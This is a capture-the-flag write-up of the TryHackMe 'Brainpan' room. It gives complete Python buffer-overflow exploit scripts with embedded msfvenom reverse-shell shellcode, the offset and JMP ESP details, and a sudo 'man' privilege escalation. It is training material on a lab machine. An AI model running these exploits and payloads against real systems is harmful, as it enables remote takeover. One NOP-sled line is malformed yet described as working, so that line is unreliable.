12 KiB
TryHackMe - Brainpan
NMAP
Nmap scan report for 10.10.31.125
Host is up (0.18s latency).
Not shown: 64659 closed tcp ports (reset), 874 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
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| [________________________ WELCOME TO BRAINPAN _________________________]
|_ ENTER THE PASSWORD
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
From the nmap scan we can see on port 9999 it's running something and asking for input and on port 10000 it's running a python server
PORT 10000 (HTTP)
It's a simple web page, so let's fuzz for files and directories here
This found a directory named /bin
And here it's an exe named brainpan.exe
which must be running on port 9999, so we need to transfer this on windows machine and try to first exploit it locally
Running file
on the exe we can see which binary this is
Spiking
After running it and trying to cause a crash in the application
It is vulnerable to buffer overlflow, so now we need to use immunity debugger and perform the steps to overflow the application
Fuzzing
Let's make script to cause a buffer overflow in the application
#!/usr/bin/python
import socket
host = "192.168.0.113"
port = 9999
buffer = "A" * 1000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
s.send(buffer)
s.recv(1024)
print "[+] Buffer sent!"
s.close()
Finding the offset
We can see the EIP
register having the value 414141 which are just bunch of A's, we need to find exaclty where the application crashed for that we need to know the offset so we can control the EIP to go to next instruction to execute commands and in order to find that we can generate a random pattern of strings using msf-pattern_create
Replace these strings with the A's in the script
After running this script, the EIP is going to hold a different value which is 35724134
Using msf-pattern-offset
we can identify the offset by providing the EIP value
We now know that if we send the input A * 524
it will cause an overflow, let's try to overwrite the EIP with 4 D's to see if we can control EIP with any value we want
#!/usr/bin/python
import socket
host = "192.168.0.130"
port = 9999
buffer = "A" * 524 + "D" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
s.send(buffer)
s.recv(1024)
print "[+] Buffer sent!"
s.close()
The EIP has the value 44444444
which from hex converts to DDDD
Identifying Bad Characters
Now the next step is to identify the bad characters for that we can just copy those characters from here
https://github.com/cytopia/badchars
Run this script and the right click on ESP
and Follow Dump
To identify bad characters, if there's any number missing like 01 it is considered as bad character but there aren't any missing characters from the input that we just sent so no bad characters
Finding the JMP instruction
Now we need to find the jump instruction JMP
which is telling the stack to go jump to an address, we need to find address of this instruction so that we can make the stack jump to our instruction for calling a reverse shell
For finding the jmp instruction we can use a python script called mona
https://github.com/corelan/mona
This script can loaded by placing it in Immunitiy debugger's PyCommands
and can be loaded with !mona
Running !mona jmp -r esp
we can identify the jmp instruction in the exe
We get only one jmp instruction 0x311712f3
Getting a reverse shell
Now we need to just generate a windows 32 bit reverse shell payload
msfvenom -p windows/shell_reverse_tcp LHOST=eth0 LPORT=2222 EXITFUNC=thread -f python -b "\x00"
#!/usr/bin/python
import socket
host = "192.168.0.139"
port = 9999
buf = b""
buf += b"\xba\x97\x93\x0e\x39\xda\xc9\xd9\x74\x24\xf4\x5f\x29"
buf += b"\xc9\xb1\x52\x31\x57\x12\x83\xef\xfc\x03\xc0\x9d\xec"
buf += b"\xcc\x12\x49\x72\x2e\xea\x8a\x13\xa6\x0f\xbb\x13\xdc"
buf += b"\x44\xec\xa3\x96\x08\x01\x4f\xfa\xb8\x92\x3d\xd3\xcf"
buf += b"\x13\x8b\x05\xfe\xa4\xa0\x76\x61\x27\xbb\xaa\x41\x16"
buf += b"\x74\xbf\x80\x5f\x69\x32\xd0\x08\xe5\xe1\xc4\x3d\xb3"
buf += b"\x39\x6f\x0d\x55\x3a\x8c\xc6\x54\x6b\x03\x5c\x0f\xab"
buf += b"\xa2\xb1\x3b\xe2\xbc\xd6\x06\xbc\x37\x2c\xfc\x3f\x91"
buf += b"\x7c\xfd\xec\xdc\xb0\x0c\xec\x19\x76\xef\x9b\x53\x84"
buf += b"\x92\x9b\xa0\xf6\x48\x29\x32\x50\x1a\x89\x9e\x60\xcf"
buf += b"\x4c\x55\x6e\xa4\x1b\x31\x73\x3b\xcf\x4a\x8f\xb0\xee"
buf += b"\x9c\x19\x82\xd4\x38\x41\x50\x74\x19\x2f\x37\x89\x79"
buf += b"\x90\xe8\x2f\xf2\x3d\xfc\x5d\x59\x2a\x31\x6c\x61\xaa"
buf += b"\x5d\xe7\x12\x98\xc2\x53\xbc\x90\x8b\x7d\x3b\xd6\xa1"
buf += b"\x3a\xd3\x29\x4a\x3b\xfa\xed\x1e\x6b\x94\xc4\x1e\xe0"
buf += b"\x64\xe8\xca\xa7\x34\x46\xa5\x07\xe4\x26\x15\xe0\xee"
buf += b"\xa8\x4a\x10\x11\x63\xe3\xbb\xe8\xe4\xcc\x94\xf2\x77"
buf += b"\xa4\xe6\xf2\x7f\x9b\x6e\x14\x15\xf3\x26\x8f\x82\x6a"
buf += b"\x63\x5b\x32\x72\xb9\x26\x74\xf8\x4e\xd7\x3b\x09\x3a"
buf += b"\xcb\xac\xf9\x71\xb1\x7b\x05\xac\xdd\xe0\x94\x2b\x1d"
buf += b"\x6e\x85\xe3\x4a\x27\x7b\xfa\x1e\xd5\x22\x54\x3c\x24"
buf += b"\xb2\x9f\x84\xf3\x07\x21\x05\x71\x33\x05\x15\x4f\xbc"
buf += b"\x01\x41\x1f\xeb\xdf\x3f\xd9\x45\xae\xe9\xb3\x3a\x78"
buf += b"\x7d\x45\x71\xbb\xfb\x4a\x5c\x4d\xe3\xfb\x09\x08\x1c"
buf += b"\x33\xde\x9c\x65\x29\x7e\x62\xbc\xe9\x9e\x81\x14\x04"
buf += b"\x37\x1c\xfd\xa5\x5a\x9f\x28\xe9\x62\x1c\xd8\x92\x90"
buf += b"\x3c\xa9\x97\xdd\xfa\x42\xea\x4e\x6f\x64\x59\x6e\xba"
buffer = "A" * 524 + "\xf3\x12\x17\x31" + buf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
s.send(buffer)
s.recv(1024)
print "[+] Buffer sent!"
s.close()
If we run this we don't get a shell
Because we need to add a few NOPs (no operation) in our payload which can be done with x90
,NOP instructions simply just slide the program execution to the next memory address
#!/usr/bin/python
import socket
host = "192.168.0.139"
port = 9999
buf = b""
buf += b"\xba\x97\x93\x0e\x39\xda\xc9\xd9\x74\x24\xf4\x5f\x29"
buf += b"\xc9\xb1\x52\x31\x57\x12\x83\xef\xfc\x03\xc0\x9d\xec"
buf += b"\xcc\x12\x49\x72\x2e\xea\x8a\x13\xa6\x0f\xbb\x13\xdc"
buf += b"\x44\xec\xa3\x96\x08\x01\x4f\xfa\xb8\x92\x3d\xd3\xcf"
buf += b"\x13\x8b\x05\xfe\xa4\xa0\x76\x61\x27\xbb\xaa\x41\x16"
buf += b"\x74\xbf\x80\x5f\x69\x32\xd0\x08\xe5\xe1\xc4\x3d\xb3"
buf += b"\x39\x6f\x0d\x55\x3a\x8c\xc6\x54\x6b\x03\x5c\x0f\xab"
buf += b"\xa2\xb1\x3b\xe2\xbc\xd6\x06\xbc\x37\x2c\xfc\x3f\x91"
buf += b"\x7c\xfd\xec\xdc\xb0\x0c\xec\x19\x76\xef\x9b\x53\x84"
buf += b"\x92\x9b\xa0\xf6\x48\x29\x32\x50\x1a\x89\x9e\x60\xcf"
buf += b"\x4c\x55\x6e\xa4\x1b\x31\x73\x3b\xcf\x4a\x8f\xb0\xee"
buf += b"\x9c\x19\x82\xd4\x38\x41\x50\x74\x19\x2f\x37\x89\x79"
buf += b"\x90\xe8\x2f\xf2\x3d\xfc\x5d\x59\x2a\x31\x6c\x61\xaa"
buf += b"\x5d\xe7\x12\x98\xc2\x53\xbc\x90\x8b\x7d\x3b\xd6\xa1"
buf += b"\x3a\xd3\x29\x4a\x3b\xfa\xed\x1e\x6b\x94\xc4\x1e\xe0"
buf += b"\x64\xe8\xca\xa7\x34\x46\xa5\x07\xe4\x26\x15\xe0\xee"
buf += b"\xa8\x4a\x10\x11\x63\xe3\xbb\xe8\xe4\xcc\x94\xf2\x77"
buf += b"\xa4\xe6\xf2\x7f\x9b\x6e\x14\x15\xf3\x26\x8f\x82\x6a"
buf += b"\x63\x5b\x32\x72\xb9\x26\x74\xf8\x4e\xd7\x3b\x09\x3a"
buf += b"\xcb\xac\xf9\x71\xb1\x7b\x05\xac\xdd\xe0\x94\x2b\x1d"
buf += b"\x6e\x85\xe3\x4a\x27\x7b\xfa\x1e\xd5\x22\x54\x3c\x24"
buf += b"\xb2\x9f\x84\xf3\x07\x21\x05\x71\x33\x05\x15\x4f\xbc"
buf += b"\x01\x41\x1f\xeb\xdf\x3f\xd9\x45\xae\xe9\xb3\x3a\x78"
buf += b"\x7d\x45\x71\xbb\xfb\x4a\x5c\x4d\xe3\xfb\x09\x08\x1c"
buf += b"\x33\xde\x9c\x65\x29\x7e\x62\xbc\xe9\x9e\x81\x14\x04"
buf += b"\x37\x1c\xfd\xa5\x5a\x9f\x28\xe9\x62\x1c\xd8\x92\x90"
buf += b"\x3c\xa9\x97\xdd\xfa\x42\xea\x4e\x6f\x64\x59\x6e\xba"
buffer = "A" * 524 + "\xf3\x12\x17\x31" + "x\90" + 30 + buf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
s.send(buffer)
s.recv(1024)
print "[+] Buffer sent!"
s.close()
We got our reverse shell now we need to deliver this on to the actual target, for getting a shell on the target machine we just need to replace the IP address
Foothold
After getting a shell, it was weird that I got a prompt saying CMD Version 1.4.1
and there was a bash script which was executing the brainpan.exe using wine
which tells that this is actually a linux machine running a windows exe , so we need to generate a linux reverse shell payload
msfvenom -p linux/x86/shell_reverse_tcp LHOST=tun0 LPORT=2222 -f python EXITFUNC=thread -b "\x00"
#!/usr/bin/python
import socket
host = "10.10.252.161"
port = 9999
buf = b""
buf += b"\xba\x5c\x45\x76\xc9\xda\xc4\xd9\x74\x24\xf4\x5e\x2b"
buf += b"\xc9\xb1\x12\x31\x56\x12\x83\xc6\x04\x03\x0a\x4b\x94"
buf += b"\x3c\x83\x88\xaf\x5c\xb0\x6d\x03\xc9\x34\xfb\x42\xbd"
buf += b"\x5e\x36\x04\x2d\xc7\x78\x3a\x9f\x77\x31\x3c\xe6\x1f"
buf += b"\xc8\xb6\x46\xe3\xa4\xc4\x76\x13\x9b\x40\x97\x93\x85"
buf += b"\x02\x09\x80\xfa\xa0\x20\xc7\x30\x26\x60\x6f\xa5\x08"
buf += b"\xf6\x07\x51\x78\xd7\xb5\xc8\x0f\xc4\x6b\x58\x99\xea"
buf += b"\x3b\x55\x54\x6c"
buffer = "A" * 524 + "\xf3\x12\x17\x31" +"\x90" * 30 + buf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
s.send(buffer)
s.recv(1024)
print "[+] Buffer sent!"
s.close()
Now we got a linux shell and we can stabilize it with python3. Running sudo -l
we can see that the user phuck
can execute anansi_util
as root user
Privilege Escalation
We have 3 commands to run , ip a
which will show network interfaces, proclist
will run ps
to view the proc files and man
command will be ran through manual
Here we can't exploit PATH variable as there's an env_reset
https://news.ycombinator.com/item?id=5306099
But there's an privesc for man command if we look at GTFOBINS
https://gtfobins.github.io/gtfobins/man/
sudo /home/anansi/bin/anansi_util manual man